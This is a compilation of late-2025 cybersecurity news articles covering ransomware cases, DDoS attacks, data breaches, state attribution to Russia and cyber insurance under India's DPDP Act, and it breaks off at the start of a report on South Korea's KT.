The Tampa medical device company paid a $1.27 million ransom; it is not clear if other ransom payments were made. The Justice Department placed the guilty pleas in the context of priori law enforcement actions aimed at disrupting ALPHV BlackCat, including the development of a decryption tool that that the U.S. says saved global victims nearly $100 million in ransom payments. The Justice Department said Goldberg and Martin each pleaded guilty to one count of “conspiracy to obstruct, delay or affect commerce or the movement of any article or commodity in commerce by extortion in violation of 18 U.S.C. § 1951(a).” The defendants are scheduled to be sentenced on March 12, 2026, and face a maximum penalty of 20 years in prison. The cybersecurity industry has faced a number of insider incidents in recent months, including a “suspicious insider” at CrowdStrike and a former cybersecurity company official who pled guilty to stealing trade secrets to sell them to a Russian buyer. In the Goldberg and Martin case, corporate assets do not appear to have been misused.

News:

The Danish Defence Intelligence Service (DDIS) announced on Thursday that Moscow was behind a cyber-attack on a Danish water utility in 2024 and a series of distributed denial-of-service (DDoS) attacks on Danish websites in the lead-up to the municipal and regional council elections in November.

The first, it said, was carried out by the pro-Russian group known as Z-Pentest and the second by NoName057(16), which has links to the Russian state.

Slashdot thread.

Chinese short-video platform Kuaishou Technology saw its shares fall sharply after the company confirmed a cyberattack that briefly disrupted its livestreaming services, exposed users to inappropriate content, and rattled investor confidence. The Kuaishou cyberattack, which occurred late on Monday night, triggered the stock’s steepest single-day decline in more than two months and pushed it to its lowest level since late November.  Shares of Hong Kong-listed Kuaishou Technology (HK:1024) fell by as much as 6% on Tuesday, dropping to HK$62.70 (approximately $8.06). This marked the company’s lowest share price since November 21 and represented its largest one-day percentage decline since October 14. The stock also emerged as the biggest decliner on the Hang Seng Tech Index, which itself fell about 0.5% on the day.  Market reaction followed confirmation of a cyberattack on Kuaishou that disrupted its livestreaming function. As one of China’s largest short-video platforms and a close competitor to Douyin, the Chinese version of TikTok, Kuaishou’s performance is closely watched by investors. The sudden service disruption and reports of exposed content raised concerns about platform security and operational resilience. 

Kuaishou Cyberattack Timeline

According to a company announcement issued on December 23, 2025, the Kuaishou cyberattack occurred at around 10:00 p.m. local time (14:00 GMT) on December 22, 2025. Cyberthreat actors targeted the live-streaming function of the Kuaishou app, temporarily interrupting services and exposing users to content described by some users as explicit and violent. Several reports characterized the incident as “unprecedented” for the platform.  Kuaishou stated that it activated its emergency response plan immediately after detecting the cyberattack on Kuaishou. Following system repairs and restoration efforts, livestreaming services gradually resumed normal operations. The company noted that other services on the Kuaishou app were not affected by the incident, although some livestreaming functions continued to experience limited disruption during the recovery phase. 

Company Response and Legal Actions 

In its press release, Kuaishou Technology said it had reported the incident to the police and relevant authorities and was pursuing further legal remedies. The company stated that it strongly condemns illegal and criminal activities linked to underground and gray industries and reiterated its opposition to any form of unlawful or harmful content.  Kuaishou also said it remains committed to operating in compliance with applicable laws and regulations and to safeguarding the interests of the company and its shareholders. While livestreaming services have largely returned to normal, the cyberattack on Kuaishou highlighted the operational and reputational risks associated with large-scale social and live-commerce platforms. 

Broader Security Concerns and Prior Data Leak Claims 

The recent cyberattack on Kuaishou has drawn renewed attention to earlier cybersecurity allegations involving the platform. In September, a threat actor on a known cybercrime forum claimed to have leaked order data allegedly stolen from Kuaishou. According to that claim, an attacker compromised a live broadcast room and used the access to place around 10,000 fraudulent orders for non-refundable virtual goods.  The data allegedly leaked included usernames, phone numbers, addresses, and order details of affected users. If accurate, the incident would represent a multi-layered security breach involving unauthorized access, financial fraud, and the exposure of personally identifiable information.  

Implications for Platform Security 

The December livestreaming Kuaishou cyberattack shows how attacks on social video and live-commerce platforms can quickly extend beyond service disruption to include content abuse, fraud, and potential data exposure, with immediate financial and regulatory impact.   As Kuaishou works to restore stability and address security gaps, the incident stresses the need for early threat detection, rapid investigation, and continuous monitoring of underground activity. Cyble supports this need through AI-powered threat intelligence that tracks dark web and cybercrime signals, correlates indicators of compromise, and enables faster response. Security teams can assess their exposure and book a personalized demo to better anticipate and mitigate similar attacks. 

The La Poste cyberattack disrupted France’s national postal service just days before Christmas, temporarily knocking key websites and mobile applications offline and slowing parcel deliveries during one of the busiest periods of the year. La Poste confirmed that the incident was caused by a distributed denial-of-service (DDoS) attack, which impacted digital systems supporting postal operations. While the company stated there was no evidence that customer data had been compromised, it acknowledged that the cyberattack affected parcel distribution and access to online services. The timing of the La Poste cyberattack raised concerns among customers expecting holiday deliveries. Social media users reported delays and uncertainty around parcel arrivals, while French media outlets noted that some people attempting to send or collect packages were turned away from post offices operating under limited capacity. With Christmas being one of the most demanding periods for the postal network, even short-lived disruptions created visible operational challenges.

La Poste Cyberattack Linked to DDoS Incident

According to company, the La Poste cyberattack involved a DDoS attack that overwhelmed parts of its digital infrastructure. As a result, several online platforms became unavailable, and some post offices were forced to operate at reduced capacity. Despite the disruption, customers were still able to carry out essential postal and banking transactions at physical counters. “Our teams are fully mobilised to restore services as quickly as possible,” La Poste said in its Twitter post, noting that remediation efforts were ongoing.

Cyberattack  on La Poste  Impacts La Banque Postale Services

The La Poste cyberattack also affected La Banque Postale, limiting customer access to online banking services and the bank’s mobile application. In a public statement shared on social media, the bank acknowledged the incident and assured customers that its teams were working to resolve the issue. “A computer incident has temporarily unavailable access to our customers' mobile app and online banking. Our teams are working to resolve the situation as quickly as possible. Online payments are possible with SMS authentication,” the bank said. [caption id="attachment_107995" align="aligncenter" width="528"] Source: Twitter[/caption] While digital access was disrupted, card payments at in-store terminals, ATM withdrawals, and SMS-authenticated online payments remained functional, reducing the impact on day-to-day financial transactions.

Recent Cyber Incidents in France

The La Poste cyberattack occurred against the backdrop of several recent cyber incidents in France involving major public institutions. Last week, France’s Interior Ministry disclosed a data breach that resulted in unauthorized access to internal email accounts and confidential documents. On December 17, 2025, authorities arrested a 22-year-old man in connection with the Interior Ministry cyberattack after an investigation led by the Paris prosecutor’s cybercrime unit. The suspect faces charges including unauthorized access to a state-run automated personal data processing system, an offense that carries a potential prison sentence of up to 10 years. Earlier, in November 2025, the French Football Federation confirmed a separate breach in which attackers used stolen credentials to access centralized membership management software. The incident exposed personal information belonging to licensed players registered through clubs nationwide. At the time of writing, La Poste has not attributed the cyberattack to any specific threat actor, and the source of the disruption remains unknown. The Cyber Express Editorial team has contacted the company for further clarification, but no response has been received so far.

The CL0P ransomware group appears to be targeting internet-facing Gladinet CentreStack file servers in its latest extortion campaign. The Curated Intelligence project said in a LinkedIn post that incident responders from its community “have encountered a new CLOP extortion campaign targeting Internet-facing CentreStack file servers.” Cyble said in a note to clients today that CL0P appears to be readying its dark web data leak site (DLS) for a new wave of victims following its exploitation of Oracle E-Business Suite vulnerabilities that netted more than 100 victims. “Monitoring of Cl0p's DLS indicates recent archiving and grouping of all previously listed victims associated with Oracle E-Business Suite exploitation under different folders, a move that strongly suggests preparation for a new wave of data leak publications,” Cyble said. “This restructuring activity is assessed to be linked to the ongoing exploitation of Gladinet CentreStack, with Cl0p likely staging victims for coordinated disclosure similar to its prior mass-extortion campaigns. No victim samples or deadlines related to the CentreStack victims have been published yet.”

CL0P May Be Targeting Gladinet CentreStack Vulnerabilities

It’s not clear if the CL0P campaign is exploiting a known or zero-day vulnerability, but in a comment on the LinkedIn post, Curated Intelligence said that an October Huntress report is “Likely related.” That report focused on CVE-2025-11371, a Files or Directories Accessible to External Parties vulnerability in Gladinet CentreStack and TrioFox that was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on Nov. 4. In a Dec. 10 report, Huntress noted that threat actors were also targeting CVE-2025-30406, a Gladinet CentreStack Use of Hard-coded Cryptographic Key vulnerability, and CVE-2025-14611, a Gladinet CentreStack and Triofox Hard Coded Cryptographic vulnerability. CVE-2025-30406 was added to the CISA KEV catalog in April, and CVE-2025-14611 was added to the KEV database on Dec. 15. In a Dec. 18 update to that post, Huntress noted the Curated Intelligence findings and said, “At present, we cannot say definitively that this is exploitation by the cl0p ransomware gang, but considering the timing of this reporting, we felt it was prudent to share this recent threat intel.” The latest release on Gladinet's CentreStack website as of December 8 is version 16.12.10420.56791, Huntress noted. “We recommend that potentially impacted Gladinet customers update to this latest version immediately and ensure that the machineKey is rotated,” the blog post said. Curated Intelligence noted that recent port scan data shows more than 200 unique IPs running the “CentreStack - Login” HTTP Title, “making them potential targets of CLOP who is exploiting an unknown CVE (n-day or zero-day) in these systems.”

CL0P’s History of File Transfer Attacks

Curated Intelligence noted that CL0P has a long history of targeting file sharing and transfer services. “This is yet another similar data extortion campaign by this adversary,” the project said. “CLOP is well-known for targeting file transfer servers such as Oracle EBS, Cleo FTP, MOVEit, CrushFTP, SolarWinds Serv-U, PaperCut, GoAnywhere, among others.” CL0P’s exploitation of Cleo MFT vulnerabilities led to a record number of ransomware attacks earlier this year, and CL0P has also successfully exploited Accellion FTA vulnerabilities. The group’s ability to successfully exploit vulnerabilities at scale has made it a top five ransomware group over its six-year-history (image below from Cyble). [caption id="attachment_107950" align="aligncenter" width="1200"] CL0P is a top five ransomware group over its six-year history (Cyble)[/caption]

The University of Sydney has confirmed a major cybersecurity incident that resulted in the exposure of personal information belonging to thousands of current and former staff members, as well as smaller groups of students, alumni, and supporters. The University of Sydney cyberattack was formally disclosed to the university community on December 18, 2025, after the institution detected unauthorized access to an internal online IT code library.  University officials said the suspicious activity was identified last week during monitoring of the platform, which is primarily used for software development and code storage. While the system was never intended to house personal records, investigators found that historical data files had been stored within the library, largely for testing purposes. These files were accessed and downloaded by an unauthorized party before the university intervened.  Upon discovering the University of Sydney cyberattack, the university immediately blocked unauthorized access and secured the affected environment. Officials also clarified that the cyberattack on University of Sydney was unrelated to a separate incident involving student results reported earlier. 

Decoding the University of Sydney Cyberattack

According to the university’s investigation to date, the data breach at the University of Sydney affected a wide range of individuals. The compromised files included a historical dataset from a retired system containing personal information about staff employed at the university as of September 4, 2018. Exposed details included names, dates of birth, phone numbers, home addresses, and basic employment information such as job titles and dates of employment.  In total, personal information belonging to around 10,000 current staff and affiliates and approximately 12,500 former staff and affiliates from that period was accessed. In addition, a collection of historical datasets, primarily from 2010 to 2019, contained personal information relating to about 5,000 students and alumni, along with data belonging to six supporters.  Vice President for Operations Nicole Gower addressed staff in a written message confirming the scope of the University of Sydney cyberattack and offering an apology. “We understand this news may cause concern, and we sincerely apologise for any distress this may cause,” Gower wrote. “While the data has been accessed and downloaded, there is currently no evidence that it has been used or published.” 

Investigation, Notifications, and Official Response

The University of Sydney has reported the incident to multiple government authorities, including the NSW Privacy Commissioner, the Australian Cyber Security Centre, the Tertiary Education Quality and Standards Agency, the National Student Ombudsman, and ID Support NSW. The university is also working with external cybersecurity partners to assess whether any of the accessed data has been disclosed online.  At this stage, the university believes the unauthorized access was confined to a single platform and did not compromise other university systems. However, the investigation remains ongoing and is expected to continue into the new year due to its complexity.  Notifications to affected individuals began on December 18, 2025. The university expects to complete this process by January 2026, once file reviews are finalized, and contact details for all impacted individuals are confirmed. Updates and responses to frequently asked questions are being published on the university’s website as the situation evolves. 

Support Services and Advice for Affected Individuals

In response to the University of Sydney data breach, a range of support services has been made available to staff, students, alumni, and affiliates. A dedicated cyber incident support service has been established to handle inquiries and will remain operational during the university’s closedown period from December 20, 2025, to January 5, 2026, excluding public holidays.  Staff members have access to counseling and wellbeing services through Converge International, while students can seek free and confidential support through Student Wellbeing services, which are available 24/7. Additional assistance is available through external organizations such as ID Support NSW, IDCARE, Beyond Blue, and Lifeline.  The university has also issued guidance urging affected individuals to remain vigilant by monitoring accounts for unusual activity, changing passwords, enabling multi-factor authentication, and being cautious of phishing attempts. Officials advised sharing details of the incident on social media to reduce the risk of scams.  University leadership reiterated that cybersecurity remains a priority and noted that an extensive program to strengthen data management practices has been underway for the past three years. Further updates will be provided as the investigation into the cyberattack on University of Sydney progresses and additional findings become available. 

Denmark cyberattack allegations have escalated into a diplomatic confrontation with Russia, after Danish authorities accused Moscow of orchestrating two cyber incidents targeting critical infrastructure and democratic processes. On Thursday, Denmark announced it would summon the Russian ambassador following findings by the Danish Defence Intelligence Service (DDIS) linking Russia to a destructive cyberattack on a Danish water utility in 2024 and a series of distributed denial-of-service (DDoS) attacks on Danish websites ahead of elections last month.

Danish officials described the Denmark cyberattack incidents as part of Russia’s broader hybrid warfare campaign against European countries supporting Ukraine, marking a rare public attribution of state-linked cyber operations.

[caption id="attachment_107928" align="alignnone" width="709"] Denmark accuses Russia of cyberattacks (Source: Denmark MFA)[/caption] In an official statement, Danish authorities said, “Russia is responsible for destructive and disruptive cyberattacks against Denmark.” The DDIS assessed that the Z-Pentest group, which executed the 2024 water utility attack, has links to the Russian state. Similarly, the agency determined that NoName057(16), the group responsible for the election-related DDoS attacks, also maintains ties to Russian state interests. 

Denmark Cyberattack on Water Utility Exposed Infrastructure Weaknesses 

The cyberattack on Denmark’s water infrastructure occurred in 2024 and targeted a waterworks facility in Køge. According to Danish officials, a hacker gained control of operational systems and altered pump pressure levels, causing pipes to burst. While the physical damage was limited, the incident raised serious concerns about the security of critical infrastructure.  Denmark’s Defence Minister Troels Lund Poulsen condemned the attack, calling it “completely unacceptable” and warning that hybrid warfare is no longer a theoretical risk. He said the incident demonstrated how cyber operations could translate into real-world consequences. Poulsen confirmed that Denmark would summon the Russian ambassador in response to the findings. 

Election-Related DDoS Attacks and Influence Campaigns 

In the lead-up to Denmark’s 2025 municipal and regional elections, multiple government and public-sector websites were hit by DDoS attacks designed to overwhelm servers and disrupt access. The DDIS stated that the attacks were intended not only to disrupt digital services but also to attract public attention and amplify insecurity during a politically sensitive period.  “The aim is to create insecurity in the targeted countries and to punish those that support Ukraine,” the intelligence service said, adding that Russia’s cyber operations form part of a broader influence campaign designed to undermine Western backing for Kyiv.  The agency noted that Danish elections were used as a platform for disruption, a tactic that has been observed in several other European countries facing similar cyberattacks and election-related interference. 

November 2025 Cyberattacks on Government and Defense Websites 

Earlier reporting by The Cyber Express documented additional cyberattack on Denmark that occurred on November 13, when multiple government and defense-related websites experienced outages. Denmark’s Civil Protection Agency confirmed that the disruptions were caused by DDoS attacks affecting several Danish companies and public-sector platforms.  “Several Danish companies and websites were currently experiencing outages and operating disruptions because of DDoS attacks,” the agency said, noting that authorities were closely monitoring the situation alongside military intelligence.  Shortly after the incident, NoName057(16) claimed responsibility on social media, alleging it had targeted systems belonging to the Danish government, including the Ministry of Transport and the public-sector portal Borger.dk. Defense contractor Terma was also named, and later confirmed it had been affected.  Terma spokesperson Tobias Brun-Falkencrone urged caution, stating, “We’re aware that a Russian hacker group has claimed that it would disrupt our website, as well as the ones of several Danish authorities, but it’s too early to say they are responsible.” He added that the company responded effectively and that no data was lost. 

Part of a Broader European Pattern 

International reporting from outlets including AFP and Ukrinform has linked the cyberattack on Denmark to a wider wave of pro-Russia cyber activity across Europe. Recent incidents include data theft from a Dutch municipality, a payment system breach in Poland affecting a major tour company, and the exposure of sensitive employee data from a British defense contractor by Russia-linked hackers.  While Danish authorities have not reported long-term damage or data loss, officials warned that repeated cyberattacks highlight persistent vulnerabilities in public infrastructure. The Civil Protection Agency and military intelligence services continue to monitor the situation.  The DDIS concluded that Russia’s use of proxy hacker groups reflects an evolving hybrid threat environment in which cyber operations are increasingly used to exert pressure, destabilize societies, and influence political outcomes without crossing traditional military thresholds. 

By Gauravdeep Singh, Head – State e-Mission Team (SeMT), Ministry of Electronics and Information Technology The Digital Personal Data Protection (DPDP) Act has fundamentally altered the risk landscape for Indian organisations. Data breaches now trigger mandatory compliance obligations regardless of their origin, transforming incidents that were once purely operational concerns into regulatory events with significant financial and legal implications.

Case Study 1: Cloud Misconfiguration in a Consumer Platform

A prominent consumer-facing platform experienced a data exposure incident when a misconfigured storage bucket on its public cloud infrastructure inadvertently made customer data publicly accessible. While no malicious actor was involved, the incident still constituted a reportable data breach under the DPDP Act framework. The organisation faced several immediate obligations:

• Notification to affected individuals within prescribed timelines
• Formal reporting to the Data Protection Board
• Comprehensive internal investigation and remediation measures
• Potential penalties for failure to implement reasonable security safeguards as mandated under the Act

Such incidents highlight a critical gap in traditional risk management approaches. The financial exposure—encompassing regulatory penalties, legal costs, remediation expenses, and reputational damage—frequently exceeds conventional cyber insurance coverage limits, particularly when compliance failures are implicated.

Case Study 2: Ransomware Attack on Healthcare and EdTech Infrastructure

A mid-sized healthcare and education technology provider fell victim to a ransomware attack that encrypted sensitive personal records. Despite successful restoration from backup systems, the organisation confronted extensive regulatory and operational obligations:

• Forensic assessment to determine whether data confidentiality was compromised
• Mandatory notification to regulatory authorities and affected data principals
• Ongoing legal and compliance proceedings

The total cost extended far beyond any ransom demand. Forensic investigations, legal advisory services, public communications, regulatory compliance activities, and operational disruption collectively created substantial financial strain, costs that would have been mitigated with appropriate insurance coverage.

Case Study 3: AI-Enabled Fraud and Social Engineering

The emergence of AI-driven attack vectors has introduced new dimensions of cyber risk. Deepfake technology and sophisticated phishing campaigns now enable threat actors to impersonate senior leadership with unprecedented authenticity, compelling finance teams to authorise fraudulent fund transfers or inappropriate data disclosures. These attacks often circumvent traditional technical security controls because they exploit human trust rather than system vulnerabilities. As a result, organisations are increasingly seeking insurance coverage for social engineering and cyber fraud events, particularly those involving personal data or financial information, that fall outside conventional cybersecurity threat models.

The Evolution of Cyber Insurance in India

The Indian cyber insurance market is undergoing significant transformation in response to the DPDP Act and evolving threat landscape. Modern policies now extend beyond traditional hacking incidents to address:

• Data breaches resulting from human error or operational failures
• Third-party vendor and SaaS provider security failures
• Cloud service disruptions and availability incidents
• Regulatory investigation costs and legal defense expenses
• Incident response, crisis management, and public relations support

Organisations are reassessing their coverage adequacy as they recognise that historical policy limits of Rs. 10–20 crore may prove insufficient when regulatory penalties, legal costs, business interruption losses, and remediation expenses are aggregated under the DPDP compliance framework.

The SME and MSME Vulnerability

Small and medium enterprises represent the most vulnerable segment of the market. While many SMEs and MSMEs regularly process personal data, they frequently lack:

• Mature information security controls and governance frameworks
• Dedicated compliance and data protection teams
• Financial reserves to absorb penalties, legal costs, or operational disruption

For organisations in this segment, even a relatively minor cyber incident can trigger prolonged operational shutdowns or, in severe cases, permanent closure. Despite this heightened vulnerability, cyber insurance adoption among SMEs remains disproportionately low, driven primarily by awareness gaps and perceived cost barriers.

Implications for the Cyber Insurance Ecosystem

The Indian cyber insurance market is entering a period of accelerated growth and structural evolution. Several key trends are emerging:

• Higher policy limits becoming standard practice across industries
• Enhanced underwriting processes emphasising compliance readiness and data governance maturity
• Comprehensive coverage integrating legal advisory, forensic investigation, and regulatory support
• Risk-based pricing models that reward robust data protection practices

Looking ahead, cyber insurance will increasingly be evaluated not merely as a risk-transfer mechanism, but as an indicator of an organisation's overall data protection posture and regulatory preparedness.

DPDP Act and the End of Optional Cyber Insurance

The DPDP Act has fundamentally redefined cyber risk in the Indian context. Data breaches are no longer isolated IT failures; they are regulatory events carrying substantial financial, legal, and reputational consequences. In this environment, cyber insurance is transitioning from a discretionary safeguard to a strategic imperative. Organisations that integrate cyber insurance into a comprehensive data governance and enterprise risk management strategy will be better positioned to navigate the evolving regulatory landscape. Conversely, those that remain uninsured or underinsured may discover that the cost of inadequate preparation far exceeds the investment required for robust protection. (This article reflects the author’s analysis and personal viewpoints and is intended for informational purposes only. It should not be construed as legal or regulatory advice.)

France is investigating whether “foreign interference” was behind remote access trojan (RAT) malware that was discovered on a passenger ferry. The ferry malware was “capable of allowing the vessel's operating systems to be controlled remotely,” Le Monde reported today, citing the Interior Minister. Interior Minister Laurent Nuñez told France Info radio that hacking into a ship's data-processing system “is a very serious matter ... Investigators are obviously looking into interference. Yes, foreign interference.” Nuñez would not speculate if the attack was intended to interfere with the ship’s navigation and he did not specifically name Russia, but he said, "These days, one country is very often behind foreign interference." The office of the Paris prosecutor said it had opened an investigation into a suspected attempt "by an organized group to attack an automated data-processing system, with the aim of serving the interests of a foreign power.”

Latvian Arrested in Ferry Malware Case

Two crew members, a Latvian and a Bulgarian, were detained after they were identified by Italian authorities, but the Bulgarian was later released. The Latvian was arrested and charged after the malware was found on the 2,000-passenger capacity ferry the Fantastic, which is owned by the Italian shipping company GNV, while it was docked in France's Mediterranean port of Sète. GNV said it had alerted Italian authorities, saying in a statement that it had "identified and neutralized an attempt at intrusion on the company's computer systems, which are effectively protected. It was without consequences," France 24 reported. Christian Cevaer, director of the France Cyber Maritime monitor, told AFP that any attempt to take control of a ship would be a "critical risk" because of "serious physical consequences" that could endanger passengers. Cevaer said such an operation would likely require a USB key to install the software, which would require "complicity within the crew." The investigation is being led by France's domestic intelligence service, the General Directorate for Internal Security (DGSI), as a sign of the importance of the case, France 24 said. After cordoning off the ship in the port, the Fantastic was inspected by the DGSI, “which led to the seizure of several items,” France 24 said. After technical inspections ruled out any danger to passengers, the ship was cleared to sail again. Searches were also conducted in Latvia with the support of Eurojust and Latvian authorities. Meanwhile, the Latvian suspect’s attorney said the investigation “will demonstrate that this case is not as worrying as it may have initially seemed,” according to a quote from the attorney as reported by France 24.

Ferry Malware Follows French Interior Ministry Attack

The ferry malware incident closely follows a cyberattack on the French Interior Ministry’s internal email systems that led to the arrest of a 22-year-old man in connection with the attack. The cyberattack was detected overnight between Thursday, December 11, and Friday, December 12, and resulted in unauthorized access to a number of document files. Nuñez described the incident as more serious than initially believed. Speaking to France Info radio, he said, “It’s serious. A few days ago, I said that we didn’t know whether there had been any compromises or not. Now we know that there have been compromises, but we don’t know the extent of them.” Authorities later confirmed that the compromised files included criminal records, raising concerns about the sensitivity of the exposed information.

Japanese office and household goods supplier Askul Corporation has begun restoring core logistics operations following a prolonged disruption caused by a ransomware incident. The Askul cyberattack, first detected on October 19, 2025, led to system outages, operational paralysis, and the confirmed exposure of sensitive personal and business data. After nearly two months of recovery work, Askul announced that system-based shipment operations had resumed, starting with two logistics centers located in Tokyo and neighboring Saitama Prefecture. The company said that eight additional distribution hubs will be brought back online gradually as safety assessments are completed. Speaking to reporters at a logistics center in Tokyo’s Edogawa Ward, President and CEO Akira Yoshioka issued a formal apology. “I sincerely apologize for the trouble and concern caused to many customers,” Yoshioka said. He added that the company was committed to pursuing “a full-fledged security governance reform” in response to the incident.

Disruption to Operations and Gradual Recovery 

The Askul cyberattack forced the company to suspend nearly all online services shortly after detection. Order intake and shipping operations across its ASKUL, Soloel Arena, and LOHACO platforms were halted on the afternoon of October 19, following confirmation that ransomware had encrypted internal systems. During the initial recovery phase, Askul accepted only limited orders via fax, restricting shipments to a small selection of essential items.  As system restoration progressed, the company gradually expanded order acceptance, prioritizing high-demand products such as copier paper. However, Yoshioka declined to provide a timeline for full restoration of logistics operations, stating that remaining hubs would reopen incrementally based on ongoing safety evaluations. 

Confirmation of Large-Scale Data Theft 

Beyond operational disruption, the Askul data breach revealed a loss of sensitive information. Askul confirmed that approximately 740,000 records were stolen during the ransomware incident, which has been linked to the RansomHouse extortion group.  According to Askul’s disclosures, the compromised data includes approximately 590,000 business customer service records and roughly 132,000 individual customer records. In addition, information related to around 15,000 business partners, such as agents, contractors, and suppliers, was affected, along with data belonging to about 2,700 executives and employees, including those at group companies.  Askul stated that detailed breakdowns of the exposed information were withheld to prevent secondary misuse. Affected customers and partners are being notified individually, and the company has reported the data breach at Askul to Japan’s Personal Information Protection Commission. Long-term monitoring measures have also been implemented to detect potential misuse of stolen data.  Importantly, Askul clarified that it does not store customer credit card information for LOHACO transactions, as payment processing is handled through an external system designed to prevent the company from accessing such data. 

Attack Timeline and RansomHouse Involvement 

The RansomHouse group publicly claimed responsibility for the Askul cyberattack, first disclosing the breach on October 30. Additional data leaks followed on November 10 and December 2. Askul confirmed that all published data was reviewed and analyzed by October 31, November 11, and December 9, respectively. A dedicated inquiry desk for affected individuals was established on November 4.  In its 13th official update, released on December 12, Askul provided a detailed chronology of the incident. After detecting ransomware activity on October 19, the company immediately isolated suspected infected systems, disconnected networks, strengthened monitoring, and initiated a company-wide password reset. By 2:00 p.m. that day, a formal incident response headquarters and specialized recovery teams were established.  External cybersecurity experts were engaged on October 20 to conduct forensic investigations, including log analysis and impact assessments. Despite these efforts, unauthorized access to an external cloud-based inquiry management system was identified on October 22. Password resets for major cloud services were completed by October 23, after which no further intrusions were confirmed. 

Technical Findings and Root Cause Analysis 

Askul’s investigation concluded that attackers likely gained initial access using stolen authentication credentials tied to an outsourced partner’s administrative account that lacked multi-factor authentication. After entering the internal network, the attackers conducted reconnaissance, collected additional credentials, disabled endpoint detection and response (EDR) tools, and moved laterally across servers.  Notably, Askul confirmed that multiple ransomware variants were deployed, including strains that evaded EDR signatures available at the time. Once sufficient privileges were obtained, attackers simultaneously encrypted data across logistics and internal systems, including backup files. This delayed recovery efforts.  The attack had a severe impact on Askul’s logistics infrastructure, which relies heavily on automated warehouses, picking systems, and integrated logistics platforms. When these systems were disabled, outbound shipments were completely halted.  Investigators also confirmed unauthorized access to an external cloud-based inquiry management system, from which data was exfiltrated and later published. Askul stated that no evidence of compromise was found in its core business systems or customer-facing platforms. 

Security Reforms and Governance Changes 

In response to the data breach at Askul, the company initiated sweeping security reforms aligned with the U.S. National Institute of Standards and Technology (NIST) Cybersecurity Framework. Enhancements include mandatory MFA for all remote access, strengthened log analysis, expanded 24/7 security monitoring, and improved asset integrity checks.  Askul has also committed to rebuilding its security governance framework by the end of the fiscal year in May 2026, focusing on enterprise risk management, clearer accountability, and stronger oversight.  The company noted that it has not contacted the attackers, negotiated, or paid any ransom, citing its responsibility to avoid encouraging criminal activity. It continues to cooperate with law enforcement, regulatory authorities, and information-sharing organizations such as JPCERT/CC. 

French authorities have arrested a 22-year-old man in connection with a French Interior Ministry cyberattack, marking an important development in an investigation into the breach of the ministry’s internal email systems. The arrest was carried out on December 17, 2025, following an inquiry led by the cybercrime unit of the Paris prosecutor’s office. According to a notice issued by France’s Ministry of the Interior, the suspect was taken into custody on charges including unauthorized access to a state-run automated personal data processing system. The offense carries a maximum sentence of up to 10 years in prison. "A person was arrested on December 17, 2025, as part of an investigation opened by the cybercrime unit of the Paris prosecutor's office, on charges including unauthorized access to a state-run automated personal data processing system, following the cyberattack against the Ministry of the Interior," the press release, translated into English, said. The ministry confirmed that the individual, born in 2003, is already known to the justice system and was convicted earlier in 2025 for similar cyber-related offenses. Authorities have not disclosed the suspect’s identity. "The suspect, born in 2003, is already known to the justice system, having been convicted of similar offenses in 2025," release added further. [caption id="attachment_107868" align="aligncenter" width="923"] Source: French Interior Ministry[/caption]

Investigation Into Cyberattack on France’s Ministry of the Interior 

The French Interior Ministry cyberattack was first publicly acknowledged last week, after officials revealed that the ministry’s internal email servers had been compromised. The cyberattack was detected overnight between Thursday, December 11, and Friday, December 12, and resulted in unauthorized access to a number of document files. French Interior Minister Laurent Nuñez described the incident as more serious than initially believed. Speaking to Franceinfo radio, he said, "It's serious. A few days ago, I said that we didn't know whether there had been any compromises or not. Now we know that there have been compromises, but we don't know the extent of them." Authorities later confirmed that the compromised files included criminal records, raising concerns about the sensitivity of the exposed information. However, Nuñez urged caution when assessing the scale of the breach. I can tell you that there have not been millions of pieces of data extracted as of this morning (...), but I remain very cautious about the level of compromise," he added.

Legal Action Aganist French Interior Ministry cyberattack

In a statement issued by Public Prosecutor Laure Beccuau, officials said the suspect of French Interior Ministry cyberattack was arrested as part of an investigation into unauthorized access to an automated data processing system, allegedly carried out as part of an organized group. Prosecutors reiterated that this offense is punishable by up to 10 years’ imprisonment. The investigation is being conducted by OFAC, France’s Office for Combating Cybercrime. Authorities noted that a further statement will be released once the police custody period ends, which can last up to 48 hours. French prosecutors also confirmed that while the suspect has prior convictions for similar crimes in 2025, they are not disclosing further details about those cases.

Government Response and Security Measures

Following the French Interior Ministry cyberattack, the Ministry of the Interior implemented standard security protocols and strengthened access controls across its systems. Speaking on RTL Radio, Minister Nuñez confirmed the attack and the immediate response, "There was indeed a cyberattack. An attacker was able to access a number of files. So we implemented the usual protection procedures." He further stated that investigations into French Interior Ministry cyberattack are ongoing at both judicial and administrative levels, and that France’s data protection authority, the National Commission for Information Technology and Civil Liberties (CNIL), has been notified. On RTL Matin, Nuñez emphasized that the origin of the French Interior Ministry cyberattack remains unclear, "It could be foreign interference, it could be people wanting to challenge the authorities and demonstrate their ability to access systems, and it could also be cybercrime. Right now, we don't know what it is."

Claims of Responsibility Surface Online

Following public disclosure of the French Interior Ministry cyberattack incident, a post appeared on an underground forum claiming responsibility for the breach. The post stated, "We hereby announce that, in revenge for our arrested friends, we have successfully compromised 'MININT' — the French Ministry of the Interior." The message appeared to reference the 2025 arrests of five BreachForums moderators and administrators, known online as “ShinyHunters,” “Hollow,” “Noct,” “Depressed,” and “IntelBroker.” However, authorities have not confirmed any direct link between the arrested suspect and these claims. As the investigation into the French Interior Ministry cyberattack continues, French officials have stressed that all possibilities remain under consideration and that further updates will follow once the custody period concludes.

A recent report by British technology research firm Rethink Technology Research has raised serious concerns over a cyberattack on KT, South Korea’s leading telecom operator, suggesting the incident may involve state-level cyber espionage rather than a simple fraud case. The report, titled “KT Cyberattack: More Serious Than You Think,” was published on December 10 and analyzes the implications of the breach in detail.  According to Rethink Technology Research, the KT cyberattack appears to have targeted femtocells, small cellular base stations used in homes and offices, not for micro-payment fraud, but potentially to collect large-scale data at a national level. The report states, “The cyberattack on South Korean telecom company KT is not a simple fraud case but closer to a state-level cyber espionage activity spanning several years when examining the details.”  The report further notes that KT’s internal logs only date back to August 2024, making it difficult to confirm what occurred at vulnerable points before that period. Analysts suggest that this lack of historical data complicates the investigation and points to possible systemic failures in femtocell management, server oversight, and encryption protocols. “It seems inevitable that KT's leadership will face accountability for management negligence,” the report adds. 

Security Experts Weigh In

